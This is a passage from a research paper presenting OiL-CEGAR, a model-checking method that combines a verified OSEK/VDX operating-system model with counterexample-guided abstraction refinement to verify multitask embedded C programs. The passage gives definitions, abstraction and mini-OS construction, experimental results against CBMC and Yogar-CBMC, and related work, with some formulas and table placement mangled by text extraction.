other visible variables or calls an API function.} \} \) Definition 2. Visible variables and visible statements - A visible variable is a variable that is globally accessible or that uses other visible variables. Visible variables include global variables, pointer variables, and variables in shared memory. - A visible statement is a simple statement that either defines/uses a visible variable or calls an API function. Definition 3. A statement block is the maximal sequence of statements \( a_1, \ldots, a_n \) in a task, where only the first statement in the block is visible and there is no statement that uses any variables defined in previous statements, i.e., \( \text{def}(a_i) \cap \text{use}(a_j) = \emptyset \) for all \( i < j \leq n \). Each statement block contains at most one visible statement and is a unit of context switching, i.e., the control flow may be switched to other tasks after the statement block has been executed. Definition 4. \( M = (S, S_0, R) \) is a statemachine, where \( S \) is a set of states, \( S_0 \) is a set of initial states, and \( R \subseteq S \times \Gamma \times G \times S \) is a set of transition relations triggered by a set of events \( \Gamma \), including a null event, and guarded by a set of guarding conditions \( G \). A transition $r \in R$ is represented as $s_i \xrightarrow{e[g]} s_j$, where $s_i$ and $s_j$ are the source and target states, respectively. We sometimes abbreviate a sequence of transitions $s_0 \xrightarrow{e_1[g_1]} s_1 \xrightarrow{e_2[g_2]} s_2 \xrightarrow{e_3[g_3]} \ldots \xrightarrow{e_n[g_n]} s_n$, as $s_0s_1s_2\ldots s_n$ to save space. We use two composition operators on statemachines, $||$ and $\odot$, which are defined as follows: **Definition 5.** $M_1||M_2 = (S, S_0, R)$ is a synchronous parallel composition of two statemachines $M_1 = (S^1, S^1_0, R^1)$ and $M_2 = (S^2, S^2_0, R^2)$ synchronized over a set of events in $\Gamma$, where - $S = S^1 \times S^2$, - $S_0 = S^1_0 \times S^2_0$, and - $R \subseteq R^1 \times R^2$ such that $s^1_i \xrightarrow{e[g]} s^1_j \in R^1$ and $s^2_p \xrightarrow{e'[g']} s^2_q \in R^2$ implies (1) $(s^1_i, s^2_p) \xrightarrow{e[g] \land e'[g']} (s^1_j, s^2_q) \in R$ if $e = e'$, (2) $(s^1_i, s^2_p) \xrightarrow{e[g] \land \neg e'[g']} (s^1_j, s^2_q) \in R$, and (3) $(s^1_i, s^2_p) \xrightarrow{e'[g] \land eg e'[g']} (s^1_j, s^2_q) \in R$. A synchronous parallel composition [29] of two statemachines allows each statemachine to perform its own transition while the other stays in the same state. **Definition 6.** $M_1 \odot M_2 = (S, S_0, R)$ is a trace composition of two statemachines $M_1 = (S^1, S^1_0, R^1)$ and $M_2 = (S^2, S^2_0, R^2)$ w.r.t. the set of error states $S^2_{E'}$ in $M_2$ and a labeling function $L$ over $S^1 \cup S^2$, where - $S \subseteq S^1$, - $S_0 \subseteq S^1_0$, and - $R \subseteq R^1$, where $r : s^1_i \xrightarrow{e[g]} s^1_j \in R$ iff $r \in R^1$ and $\exists r' : s^2_p \xrightarrow{e'[g']}, s^2_q \in R^2$ such that $s^1_i \xrightarrow{e[r]} s^1_j$, $L(s^1_i) = L(s^2_p)$, $L(s^1_j) = L(s^2_q)$, and $g \implies g'$. A trace composition only allows a transition of a statemachine when the other statemachine has an equivalent transition w.r.t. the state labels and transition conditions that does not lead to an error state. **IV. OiL-CEGAR** OiL-CEGAR takes advantage of both CEGAR and the use of the OS in the model checking process with a two-way reciprocal abstraction scheme. It is a variation of CEGAR in that (1) a verified OS model is used to enhance the accuracy of the property checking and (2) the scheduling information in the counterexample generated from the property checking is used to construct a mini-OS, instead of the full-scale OS implementation, for checking the executability of the counterexample on the program source code. This section provides an intuitive introduction to OiL-CEGAR. Technical details will be provided in later sections. **A. Overview of OiL-CEGAR** Figure 4 illustrates the OiL-CEGAR process. It starts with the composition of a verified OS model $M_{os}$ and an initial sound abstraction $M_{app}$ of a given application program $M_{app}$. For a given property $\varphi$, if the composition model $M = M_{os} || M_{app}$ respects the property, i.e., $M \models \varphi$, then we conclude that the concrete embedded software $M_{os} || M_{app}$ also respects the property. Otherwise, a counterexample $\tau$ showing a property violation in the form of a sequence of states in $M$ is generated. As $\tau$ can be a false alarm, due to the use of the abstract model $M_{app}$ in the verification, so we need to check its executability on the concrete system $M_{os} || M_{app}$. However, as it is difficult to construct an execution environment for the actual implementation of the OS and the application program, we instead check the reachability of the composition, $M_{os}(\tau) || M_{app}$, where $M_{os}(\tau)$ is a mini-OS constructed from $\tau$, so that if it terminates in a final state, we can conclude that $\tau$ is an executable execution sequence in the concrete program, i.e., a true alarm. Otherwise, a trace $\tau'$, a subsequence of $\tau$ from the initial state to the first unreachable state of $\tau$, is generated and is used to refine $M$, which is used in the next iteration of OiL-CEGAR. This process is repeated until either an actual property violation is found or the property is proved. Two well-known model checkers are used in OiL-CEGAR: the symbolic model checker NuSMV [11] for LTL property checking of $M_{os} || M_{app} \models \varphi$ and the SAT-based C code model checker CBMC [1] for checking the reachability of $M_{os}(\tau) || M_{app}$. **B. Construction of $\overline{M_{app}}$** An application program is a parallel composition of multiple tasks, i.e., $M_{app} = P_1 || P_2 || \ldots || P_n$. We construct an abstraction of $M_{app}$, $\overline{M_{app}}$ by abstracting each task, i.e., $\overline{M_{app}} = M_{P_1} || M_{P_2} || \ldots || M_{P_n}$, where each $M_{P_i}$ is a statemachine representation of each task $P_i$. Figure 5 illustrates how each task $P_i$ is modeled as a statemachine using the example code shown in Figure 1. We first construct a control flow graph (CFG) of each task, abstract the CFG by eliminating statements involving visible variables, and then transform the abstract CFG into a statemachine model by adding transitions from the exit node to the entry node (as a task can be reactivated after its termination) and guarding conditions to each transition to check the internal state of the task. Details of the conversion process will be explained in Section VI. Fig. 5. Construction of the task model \[ M_{\text{app}} \] is composed with the OS model. Figure 6 illustrates a simplified \( M_{\text{os}} \mid M_{\text{app}} \) for the example in Figure 1, where each state consists of the internal state of task t1, the internal state of task t2, the block number of task t1, and the block number of task t2, respectively. The transition finishes either at s13, indicating that task t2 is in the waiting state, or at s26, indicating that all the tasks have terminated. Let us assume that we are checking the following property: P1. A call to \( \text{WaitEvent} \) shall be followed by a matching call to \( \text{SetEvent} \). Model checking this property would generate a counterexample, say \( s_0s_1s_2s_3s_4s_5s_6s_7s_8s_9s_{10}s_{11}s_{12}s_{13}s_{14}s_{15}s_{16}s_{17}s_{18}s_{19}s_{20}s_{21}s_{22}s_{23}s_{24}s_{25}s_{26} \), where t2 would go to the waiting state and stay there forever. \( \tau \) is a finite maximal subsequence of a counterexample trace that does not end with a cycle. C. Executability checking using \( \tau \) Whether the counterexample \( \tau \) is a realistic execution trace or not is tested in the concrete application program \( M_{\text{app}} \). As the counterexample trace contains information on task execution sequences, we use this information to guide the execution sequence of the tasks in the actual program code. The task execution sequence is a sequence of states in \( \tau \) projected to the states of the OS. For example, \( \tau_{|\text{os}} = s_0s_1s_2s_3s_4s_5s_6s_7s_8s_9s_{10}s_{11}s_{12}s_{13}s_{14}s_{15}s_{16}s_{17}s_{18}s_{19}s_{20}s_{21}s_{22}s_{23}s_{24}s_{25}s_{26} \) is the actual sequence of blocks to be executed according to this counterexample trace. However, it is impossible to execute \( B_1^1 \) after \( B_3^1 \); i.e., \( s_7 \rightarrow s_{11} \) is a non-executable transition in \( \tau \) because if \( \text{wait}_{\_sw}==\text{ON} \), it must execute \( B_1^1 \). We use the C code model checker CBMC to identify the first non-executable transition in the counterexample trace using the information on the task execution sequence extracted from the trace called mini-OS, which acts like a test driver. If the counterexample trace \( \tau \) has an unreachable transition in the actual application program, we use the same trace up to the first unreachable state, named \( \tau' \), to refine \( M_{\text{os}} \mid M_{\text{app}} \). D. Refinements using \( \tau' \) Once \( \tau' \) is identified, we refine \( (M_{\text{os}} \mid M_{\text{app}}) \) so that \( \tau' \) can be eliminated from its possible execution traces. To this end, we first construct a state machine \( A(\tau') = (S, s_0, T, S_E) \), where \( S = \{ s \in \tau' \mid S \} \cup \{ s_U \} \) is the set of states in \( \tau' \) plus one additional special state \( s_U \) representing the universal state; \( s_0 \) is the initial state in \( \tau' \); \( s_E \) is the final state of \( \tau' \) representing the error state; and \( T = \tau' \cup \{ s \rightarrow s_U \mid s \neq s_E \} \cup \{ s_U \rightarrow s_U \} \cup \{ s_E \rightarrow s_E \} \) is a set of transitions in \( \tau' \) plus new transitions from each non-error state to the universal state plus self-transitions of \( s_U \) and \( s_E \). Figure 7 illustrates \( A(\tau') \) for our example for each iteration of OIL-CEGAR. \footnote{RUN, RDY, WIT, and SUS are abbreviations for Running, Ready, Waiting, and Suspended} \( \tilde{M}_{\text{app}} \) is refined by constructing \((M_\text{os}||\tilde{M}_{\text{app}}) \circ A(\tau')\), where \( \circ \) represents the trace composition of the two state machines. The trace composition \( A \circ B \) allows transitions of \( A \) only when \( A \) and \( B \) share the equivalent source/target states and satisfy both transition conditions, and when the target state is not the error state. For example, the trace composition of \((M_\text{os}||\tilde{M}_{\text{app}}) \) shown in Figure 6 and \( A(\tau_1) \) in Figure 7 (a) results in removing the trace \( s_0s_1s_2s_4s_5s_6s_7s_{11} \) from \((M_\text{os}||\tilde{M}_{\text{app}}) \). The OIL-CEGAR process is repeated from the property checking of \((M_\text{os}||\tilde{M}_{\text{app}}) \circ A(\tau_1)\), producing refinement bases as shown in Figure 7 (b) and Figure 7 (c), and thus, removing traces \( s_0s_1s_2s_4s_5s_6s_7s_{11} \) and \( s_0s_1s_2s_4s_5s_6s_7s_{12} \) in order, before it concludes that the property is satisfied. \section*{V. ABSTRACTION} OIL-CEGAR starts by constructing an application model \( \tilde{M}_{\text{app}} \) as a synchronous parallel composition of statemachines, each representing a task in the application program. This section explains two major abstractions applied to the source code of each task before the application model was composed with the operating system model. \subsection*{A. Pre-processing} Due to the limited expressive power allowed in the input language of NuSMV compared to that of the implementation language C, we performed two types of pre-processing on the source code. First, user-defined functions were replaced with inline functions, assuming that the program did not contain any infinite recursive calls. Second, composite structures such as arrays and user-defined structures were flattened so that all variables were typed as primitives, assuming that there were no dynamic allocations and that they were thus of fixed size. These assumptions are valid for embedded systems in critical domains, as recommended by the MISRA-C international standard [30]. \subsection*{B. Control abstraction} Multitask programs have multiple threads of control that interleave with each other. This context switching may happen as low as at the instruction level, but it is infeasible as well as uninteresting to consider all possible context switching behaviors in multitasking programs. In this work, we applied control abstraction to the CFG of each task based on the notion of partial-order reduction [31] by defining the statement block as a maximal sequence of statements to be executed without interrupts. The statement block in Definition 3 is a unit of such a context switch, whose execution is independent of concurrently executed transitions of other tasks. The CFG of each task in the application source code was constructed using the statement block as a unit of execution. The rationale behind this was: (1) Non-visible variables would not be affected by context switching, but visible variables may be, and (2) a call to an API function certainly causes an intervention of the operating system that may require context switching among tasks. In addition, we refined the statement block to separate statements with def-use relations into different blocks, due to the execution semantics of NuSMV, which executes all statements in a block at the same time. Figure 5 (a) shows the control-abstracted CFG of Figure 1. Blocks \( B^1_1 \) and \( B^1_2 \) in Figure 5 (a) are the abstraction of lines 01-02 and lines 05-06 of Figure 1, respectively. Line 07 is not blocked together with lines 05-06 because it is a visible statement and also references the variable \textit{local}_var, which is defined in line 06. \subsection*{C. Data abstraction} A series of selective predicate abstractions was performed on the CFG of the pre-processed, control-abstracted application source code. These abstractions are major sources of non-executable counterexample generation, but greatly help to reduce the complexity of property checking. 1) Abstraction of visible statements: Each visible statement is replaced by an empty statement with a unique symbol. 2) Abstraction of platform-dependent functions: Platform-dependent, user-defined library functions are replaced with stubs that return arbitrary values of the same return type. This abstraction is performed manually, once for each OS platform. 3) Abstraction of branch conditions: If a branch condition references a visible variable, the condition is replaced with a Boolean variable whose value can be nondeterministically assigned during property checking. 4) Numeric data abstraction: Statements involving floating points variables are replaced with empty statements. This is due to a limitation of the model checker NuSMV, which cannot handle floating points. Compared to typical predicate abstraction [17], the suggested data abstraction is selective, as it is not applied to local variables with fixed size. This is to avoid unnecessary over-approximation, as embedded software frequently uses variables with fixed size due to the stringent memory space. Figure 5 (b) shows the data-abstracted CFG. The first statement of \( B^1_1, B^1_2 \), the statement of \( B^2_1, B^2_3, B^2_2, \) and \( B^3_2 \) are replaced with empty statements because they reference either a pointer variable \textit{rho} or a global variable \textit{wait}_sw. The second statement of \( B^1_1 \) and the second statement of \( B^1_2 \) are not abstracted because local_var is a local integer variable that does not have any dependency on any visible variables. VI. MODEL CONSTRUCTION AND IMPLEMENTATION Oil-CEGAR requires the construction of three types of models: the task model constructed from each task CFG after a series of abstractions; the composition of the application model and the OS model; and a mini-OS constructed from a counterexample trace generated from property checking. This section explains the construction of a task model and a mini-OS in more detail. A. Task model construction The abstracted CFG for each task is converted into a statemachine $A_t = (S^t, R^t, S^t_0)$ by mapping the set of statement blocks and the set of control flow edges in the CFG to a set of states $S^t$ and a set of transitions $R^t$, respectively. An additional transition from the final block to the entry block is added to allow the same task to be activated multiple times, removing the final state from the machine. Each transition in the statemachine is guarded by internal_state[$t$] := running to enable the transition only when the task is in the running state. Note that the information about the internal state of each task is maintained by the OS model. Figure 5 (c) illustrates the task models converted from Figure 5 (b), where the common guarding condition internal_state[$t$] := running is omitted from each transition to save space. The application model $\widehat{M}_{app} = A_{t_1} || A_{t_2} || \ldots || A_{t_n}$ is a synchronous parallel composition of task statemachines. Given the number of tasks $n$ in an application program, a parallel composition of an OS model and an application program includes $n$ statemachines for representing tasks internally maintained by the OS and $n$ statemachines, each representing the application logic of each task, synchronized over the set of API function calls and the internal states of the tasks, i.e., $$M_{os}[\widehat{M}_{app}] = \widehat{M} || (M_{t_1} || \ldots || M_{t_n}) || (A_{t_1} || \ldots || A_{t_n})$$ where $\widehat{M}$ is a parallel composition of kernel objects other than tasks, such as events, resources, alarms, or schedulers. We use $\langle M_{os}[\widehat{M}_{app}] \rangle_\tau = (M_{t_1} || \ldots || M_{t_n}) || (A_{t_1} || \ldots || A_{t_n})$ to represent the projection of $M_{os}[\widehat{M}_{app}]$ on the task statemachines of the system, as only the task part of the model is of interest for us in the refinement process of the Oil-CEGAR. B. Mini-OS construction Given a property $\varphi$, the property checking $M_{os}[\widehat{M}_{app}] = \varphi$ generates a counterexample if $\varphi$ is not satisfied by $M_{os}[\widehat{M}_{app}]$. When $\langle M_{os}[\widehat{M}_{app}] \rangle_\tau$ is a composition of $n$ OS statemachines and $n$ task application statemachines, the counterexample trace $\tau$ projected to $\langle M_{os}[\widehat{M}_{app}] \rangle_\tau$ is a sequence of composite states with $2*n$ elements. The counterexample trace could be an infinite sequence, but we consider only a finite subsequence of it. Definition 7. A counterexample trace $\tau |_{T} = s_0s_1s_2\ldots s_m$ is a sequence of states with length $m+1$. Each state $s_i$ is a composite state of $2*n$ elements $< o_1^i, o_2^i, \ldots, o_n^i, t_1^i, t_2^i, \ldots, t_n^i >$, where $n$ is the number of tasks in the application program. Model checking may generate an infinite counterexample trace in case it ends with a cycle. In such a case, $\tau |_{T}$ is the maximal subsequence of the counterexample trace after removing the final cycle. For simplicity of notation, we will use $\tau$ and $\tau |_{T}$ interchangeably in the remaining discussions. We will also use $s_{i|os}$ and $s_{i|app}$ to represent the OS part and the application part of the composite state $s_i$ in $\tau |_{T}$, respectively. The counterexample trace includes information on task execution sequences, i.e., $\tau |_{os} = s_0|os{s}_1|os\ldots s_m|os$, which can act as a mini-OS that drives the executability checking of $\tau |_{app}$ in the application program code. Definition 8. A mini-OS $\widetilde{M}_{os}(\tau) = (S^t, S^t_0, R^t, s^t_0)$ is a statemachine constructed from a counterexample trace $\tau = s_0s_1s_2\ldots s_m$, where $S^t = \{ s_{i|os} | s_i \in \tau \}$, $S^t_0 = \{ s_0|os \}$, $R^t = \{ s_i|os \rightarrow s_{i+1}|os | i = 0 \ldots m - 1 \}$, and $s^t_0 = s_m|os$. The mini-OS is just a sequence of finite state transitions where each state indicates the internal states of each task. Using this mini-OS as a test driver, we checked whether the application program is executable until the mini-OS reaches the final state under the following execution semantics of the application program. $$E_{exec}(i) = \begin{cases} (B_{i_1}, B_{i_2}, \ldots, B_{i_n}), B_{i_j} \rightarrow B'_{i_j}, \widetilde{M}_{os}(\tau)|_{app} = i_k \quad \text{if } B_{i_1}, B_{i_2}, \ldots, B'_{i_k}, B_{i_{k+1}}, \ldots, B_{i_n} \end{cases}$$ When the application program consists of $n$ tasks, the $i_{th}$ execution block is a statement block that belongs to the task assigned to run by the $i_{th}$ state of the mini-OS. With this execution semantics, we applied CBMC model checking to the application program to check whether it finishes all $m+1$ executions as indicated in the mini-OS. If so, the counterexample $\tau$ is an executable counterexample, i.e., a true alarm. Otherwise, we can identify the first non-executable transition $s_j|os \rightarrow s_{j+1}|os$, where $s_j|os \rightarrow s_{j+1}|os$ is executable for all $0 \leq j < k$. We used the sequence of states from $s_0$ to $s_{k+1}$, named $\tau'$, to refine $M_{os}[\widehat{M}_{app}]$. C. Refinement model construction $\tau'$ is an execution trace in $M_{os}[\widehat{M}_{app}]$ that leads to the first non-executable transition in $M_{app}$. The goal of refinement is to remove such non-executable execution traces from the model until a counterexample trace executable in the application program is found or until no more counterexample traces exist. We first constructed a statemachine $A(\tau')$ that included all states and transitions in $\tau'$ plus an additional state $s_U$ to represent the Universal state and transitions from each non-error state to $s_U$. 2 2 NuSMV provides a counterexample trace indicating the start of a cycle, if there is any. Definition 9. A refinement base \( A(\tau') = (S\tau', s_0', R\tau', s_E') \) is a statemachine constructed from a non-executable counterexample trace \( \tau' = s_0 s_1 s_2 \ldots s_k s_{k+1} \), where - \( S\tau' = \{ s_i \mid s_i \in \tau' \} \cup \{ s_U \} \); - \( s_0' = s_0 \); - \( s_E' = s_{k+1} \); - \( R\tau' = \{ s_i e[l] s_{i+1} \mid i = 0 \ldots k \} \cup \{ s_i e[g] s_U \mid i \leq k, (e' \neq e \land g' = true) \lor g = \neg g' \} \cup \{ s_{k+1} \rightarrow s_U \rightarrow s_U \} \). We used the refinement base to trace-compose, as defined in Definition 6, with the verification model using the labeling function \( L \). Here, \( L \) is defined over \( S \cup S\tau' \) as \( L(s) = L(s') \) iff \( s = s' \) or \( s = s_U \) or \( s' = s_U \). Since there is a transition from any non-error state to \( s_U \) in \( A(\tau') \) and \( s_U \) has the same label as any other state, \( M \circ A(\tau') \) allows all transitions in \( M \) except for the sequence of transitions from the initial state to the error state in \( \tau' \). D. Implementation The prototype tool we used to implement Oil-CEGAR consisted of three components for model generation, executability checking, and refinement. Figure 8 illustrates the overall process of the prototype tool, where the implementation for representing statemachine models in NuSMV follows the approach described in [32]. The formal OS model used in our tool is from the automotive domain and is based on the OSEK/VDX international standard for automotive OSs [23] and using the following three test sets: TS1. A set of application programs running on Lego Mindstorms NXT [33]. TS2. A set of test programs from a commercial conformance test suite used for certifying implementations of OSEK/VDX-based OSs [34], and TS3. A window controller program from the automotive domain [35]. We chose the programs in TS1 for the sake of fair comparison because they are open to the public, even though they are quite small in scale. TS2 is a more realistic test set as it comes from domain experts, but it is not open to the public. The experiments with TS3 were done to check the feasibility of applying Oil-CEGAR in a program with high complexity. All experiments were performed on a Fedora Linux-based machine with a 3.4-GHz Intel Xeon E5-1680 CPU and 128 GB of memory. We used CBMC version 5.10 for executability checking, and NuSMV version 2.6.0 with dynamic variable reordering and cone-of-influence reduction. These options were used to accelerate the verification performance. A. Effectiveness of Oil-CEGAR The first experiment was aimed at evaluating the effectiveness of Oil-CEGAR using TS1 and TS2. TS1 contained eight programs with varying sizes from 35 to 87 lines of codes and two to three tasks in each application. TS2 contained 14 test programs with 172 to 571 lines of code and five to seven out program paths that do not respect the condition \( c \) during CBMC model checking. This assumption is used to check only those execution paths that follow \( \tau_{app} \) and to ignore all other execution sequences of statement blocks. Each block ends with saving the label of the next statement block to be executed in \( pc \) and returning control to \( main \). If the task sequence is executable, CBMC is supposed to find verification failures for all assertions specified in \( main \). Otherwise, we can identify the first assertion that did not fail, meaning that the task (and its corresponding statement block) called before the assertion checking is non-executable. In the second experiment, we applied two representative C code model checking tools (CBMC [1] and Yogar-CBMC [4]) to TS1 and TS2 to compare the verification accuracy of OiL-CEGAR to that of the best-known existing verification approaches for multitask programs. CBMC is the most stable and widely used C code model checker for the verification of multi-threaded programs under arbitrary interleavings among threads. Yogar-CBMC implements CEGAR in CBMC and is the 2017, 2018, and 2019 winner of the SV-COMP competition in the verification of concurrent programs. We successively increased the loop bound from 2 to 21 when applying CBMC, until it either found a counterexample or verified the property without violating the unwinding assertion. Yogar-CBMC automatically sets the loop bound during the CEGAR process. We used a time bound of one hour for both cases. Columns nine to fourteen of Table I show the verification results. To the right of column nine, the columns show the verification time, the number of loop unwindings, the verification result of CBMC, and the verification result of Yogar-CBMC, respectively. CBMC and Yogar-CBMC were unable to find any executable counterexample trace for any of the six programs supposed to violate the property. Yogar-CBMC was able to verify two out of sixteen programs correctly, but CBMC was not able to verify any of them. Even though they identified counterexamples relatively quickly, they were all false alarms caused by infeasible context switches (WCS), caused by allowing two instances of a task running at the same time (WT) or by allowing a task with lower priority to run prior to a task with higher priority (WP), or took more than one hour tasks. These programs were verified with the same property P1, “A call to WaitForEvent shall be followed by a matching call to SetEvent”. ### Table I <table> <thead> <tr> <th>App</th> <th>#T</th> <th>LoC</th> <th>B(NB)</th> <th>Verification</th> <th>Exec. chk.</th> <th>Result</th> <th>Verif. w/o OS - CBMC</th> <th>Verif. w/o OS - YOGAR-CBMC</th> </tr> </thead> <tbody> <tr> <td></td> <td></td> <td></td> <td></td> <td>Time(s)</td> <td>Time(s)</td> <td>#R</td> <td>Time(s)</td> <td>#U</td> </tr> <tr> <td>bimaster</td> <td>3</td> <td>87</td> <td>5(1)</td> <td>5.415</td> <td>-</td> <td>0.62</td> <td>violated</td> <td>0.38</td> </tr> <tr> <td>btslave</td> <td>3</td> <td>86</td> <td>5(1)</td> <td>5.330</td> <td>-</td> <td>0.61</td> <td>violated</td> <td>0.37</td> </tr> <tr> <td>cubbyhole</td> <td>3</td> <td>37</td> <td>2(0)</td> <td>0.616</td> <td>-</td> <td>-</td> <td>satisfied</td> <td>1.59</td> </tr> <tr> <td>eds</td> <td>3</td> <td>60</td> <td>4(0)</td> <td>0.626</td> <td>-</td> <td>-</td> <td>satisfied</td> <td>0.44</td> </tr> <tr> <td>eventest</td> <td>3</td> <td>35</td> <td>6(4)</td> <td>0.238</td> <td>-</td> <td>-</td> <td>satisfied</td> <td>614.05</td> </tr> <tr> <td>message</td> <td>3</td> <td>68</td> <td>5(2)</td> <td>4.076</td> <td>-</td> <td>-</td> <td>satisfied</td> <td>0.39</td> </tr> <tr> <td>resourcetest</td> <td>2</td> <td>54</td> <td>9(0)</td> <td>0.475</td> <td>-</td> <td>-</td> <td>satisfied</td> <td>-</td> </tr> <tr> <td>tttest</td> <td>2</td> <td>48</td> <td>6(4)</td> <td>1.133</td> <td>-</td> <td>-</td> <td>satisfied</td> <td>-</td> </tr> <tr> <td>conf0_1</td> <td>6</td> <td>172</td> <td>4(2)</td> <td>40</td> <td>0</td> <td>0.131</td> <td>violated</td> <td>0.47</td> </tr> <tr> <td>conf0_2</td> <td>5</td> <td>329</td> <td>9(0)</td> <td>735</td> <td>4</td> <td>0.145</td> <td>satisfied</td> <td>2.41</td> </tr> <tr> <td>conf0_3</td> <td>6</td> <td>409</td> <td>9(0)</td> <td>498</td> <td>1</td> <td>0.350</td> <td>satisfied</td> <td>2.69</td> </tr> <tr> <td>conf0_4</td> <td>5</td> <td>419</td> <td>6(0)</td> <td>360</td> <td>3</td> <td>0.158</td> <td>violated</td> <td>1.05</td> </tr> <tr> <td>conf0_5</td> <td>5</td> <td>419</td> <td>13(0)</td> <td>2166</td> <td>3</td> <td>0.224</td> <td>satisfied</td> <td>0.94</td> </tr> <tr> <td>conf0_6</td> <td>5</td> <td>305</td> <td>17(0)</td> <td>638</td> <td>3</td> <td>0.168</td> <td>satisfied</td> <td>51.29</td> </tr> <tr> <td>conf0_7</td> <td>6</td> <td>505</td> <td>12(0)</td> <td>205</td> <td>1</td> <td>0.173</td> <td>satisfied</td> <td>1.02</td> </tr> <tr> <td>conf0_8</td> <td>6</td> <td>317</td> <td>17(0)</td> <td>613</td> <td>3</td> <td>0.216</td> <td>satisfied</td> <td>58.41</td> </tr> <tr> <td>conf0_9</td> <td>5</td> <td>362</td> <td>11(0)</td> <td>1521</td> <td>3</td> <td>0.153</td> <td>satisfied</td> <td>72.53</td> </tr> <tr> <td>conf0_10</td> <td>7</td> <td>346</td> <td>15(0)</td> <td>2904</td> <td>3</td> <td>0.277</td> <td>satisfied</td> <td>2.65</td> </tr> <tr> <td>conf0_11</td> <td>6</td> <td>571</td> <td>21(0)</td> <td>280</td> <td>1</td> <td>0.118</td> <td>violated</td> <td>74.25</td> </tr> <tr> <td>conf0_12</td> <td>6</td> <td>276</td> <td>5(0)</td> <td>157</td> <td>0</td> <td>0.211</td> <td>violated</td> <td>0.35</td> </tr> <tr> <td>conf0_13</td> <td>6</td> <td>310</td> <td>12(0)</td> <td>169</td> <td>1</td> <td>0.229</td> <td>satisfied</td> <td>0.58</td> </tr> <tr> <td>conf0_14</td> <td>6</td> <td>308</td> <td>11(0)</td> <td>167</td> <td>1</td> <td>0.236</td> <td>satisfied</td> <td>0.88</td> </tr> </tbody> </table> We manually analyzed all 22 programs to ensure that our verification results using OiL-CEGAR are accurate. of time bound (TO). Note that multiple activations of the same task are possible, but only one of the activated tasks should run if priority-based FIFO scheduling is used. As CBMC and Yogar-CBMC do not take this situation into account, false alarms such as WT may occur. The programs eventest, resourcestest, and itttest are costly to verify, taking far more time for counterexample generation or going over the time limit. This is because they contain a nested loop or a large number of iterations, e.g., five million iterations in one example. C. Scalability to complex systems with alarms and ISRs The last experiment aimed to check how expensive it is to apply OIL-CEGAR to an application program with multiple alarms and interrupt service routines (ISRs). Alarms periodically fire requests to OS services. ISRs handle interrupts, which may occur at any time. They usually have higher priority than tasks, preempting the running task at arbitrary times. This is a major source of complexity in the verification of multitasking programs. The automotive window controller program in TS3 comprises 980 lines of code, consisting of five tasks, five alarms, and one ISR. The controller has eight system states: close, lock, locked, open, down, stall, up, and reverse. OIL-CEGAR was applied to this program w.r.t property P2: P2. (For each system state) The system state is not reachable from the initial state. Table II shows the verification results. OIL-CEGAR successfully identified counterexamples for all eight states, showing that all states were reachable after 0 to 17 refinement iterations. The length of the generated counterexamples ranged from 14 to 23. The cost for the verification was quite high. For example, checking reverse took over 26 hours for 17 iterations of property checking and over 3.5 hours for executability checking using CBMC. However, the verification result was 100% accurate. D. Threats to validity OIL-CEGAR guarantees that property violations are found when a sound OS model is used, but does not guarantee that all false alarms will be identified, unless the model is also complete. The use of a sound OS model is a necessary prerequisite for OIL-CEGAR, as it may not be able to identify real alarms in the first place if this is not the case, which is a common requirement for most formal model-based approaches. Available formal OS models [5]–[8] are sound, but might not be complete w.r.t time-dependent behaviors due to the use of relative timing. Our experiments showed 100% verification accuracy because the properties were not time-dependent. The pre-processing applied to the application source code, such as the flattening of data structures and the use of fixed-size primitive data types, assumes that the program does not contain any data structure with undefined size, as recommended by the MISRA-C standard. If this assumption is not fulfilled, the pre-processing might not be sound and should better be replaced by data abstraction [36] or predicate abstraction [17], which guarantee soundness. We also limited the value ranges of the fixed-size variables in the model because NuSMV is not good at dealing with variables over a large range. This data abstraction should be performed with care, e.g., by using value analysis [37], in order not to undermine the soundness of the model. Though our experiments showed great improvement of verification accuracy, OIL-CEGAR might not be able to identify non-executable counterexample traces, as we considered only finite substraces of possible infinite traces. Similar to existing CEGAR approaches, OIL-CEGAR might not terminate as it might refine the model infinitely, e.g., when a task contains an infinite loop. Our experiments were limited to API call constraint checking and reachability checking. However, OIL-CEGAR can also be used for general property checking with minor changes in task annotation, as NuSMV is capable of checking LTL and CTL properties and CBMC is used only for a bounded search of the counterexample trace. VIII. RELATED WORK Numerous approaches for verifying embedded control software exist, which can be divided into three categories: (1) verification of application programs with a highly abstracted scheduling policy [1]–[4], [38]; (2) verification approaches for OS [5]–[8] that focus on the correctness of either OS models or implementations; and (3) a number of recent works on the verification of embedded programs with verified OS models [25], [32], [39]–[41]. A. Verification with a highly abstracted scheduling policy This approach has been a main stream in research and practice for model checking multitasking programs. The approaches in [1]–[4], [38] assume arbitrary interleavings among tasks, but reduce verification complexity by either using partial order reduction or limiting the number of context switches among tasks. Lazy-CSeq [3], [42] further improves verification performance by predicting a range of values on numeric typed variables [43]. References [4], [44] apply CEGAR under the assumption of arbitrary interleavings among tasks. Notably, references [4] found that most of the CNF formulas generated by CBMC are related to the scheduling constraint that checks sequential consistency [45] of shared variables, and applied CEGAR on the scheduling constraint to achieve better performance. These approaches suffer from a high rate of false alarms by allowing arbitrary sequences of task executions, as demonstrated through our experiments. B. Verification of application software with OS There are approaches that use verified OS models to reason about application programs. References [22], [32], [40], [46] verified embedded programs with a formal OS model using Spin [28] or NuSMV by translating the application program into the modeling language used to model the operating system. Due to the difference in expressiveness between the implementation language and the modeling language, it is unavoidable that these approaches introduce abstractions into the translation process, which can be a source of false alarms. It is also predicted that faithful translation would result in high verification cost. These issues are not treated in the existing approaches. Reference [25] is unique in that the application program is implicitly converted into rewrite logic within the K-framework, which is equipped with language interpreters for C, Java, and JavaScript. However, it suffers from high verification cost due to the use of faithful interpretation of the program code as well as the formal OS model. C. Refinement methods Techniques for improving the efficiency of model refinements have been an active research issue [4], [13]–[16]. Studies [4], [13], [14] refine the CNF formula using SAT-core [47], which is a subset of the formula that is sufficient for establishing inconsistency with a counterexample. In trace abstraction refinement [15], [16], the program is abstracted so that arbitrary execution of statements is possible and non-executable counterexamples are iteratively excluded from the model by checking the post-condition of each statement. The refinement in Oil-CEGAR is conceptually similar to trace abstraction refinement, but is different in that it uses the scheduling information of the counterexample and the model checker CBMC to identify non-executable counterexamples. A. Why model-based? One might argue that code-based verification is more practical and efficient, as model-based approaches require extra work, whereas we can apply C code model checking directly to C source code. This is not true if we have to take the OS behavior into account because the OS implementation typically involves platform-dependent libraries and direct access to hardware. Abstraction and modeling are therefore necessary. We can perform abstractions at the code level or translate the OS model into the C language and perform code-level model checking. If we do this, however, we lose all the powerful support of the modeling language, such as implicit support for concurrency, atomicity, and blocking and restarting of a 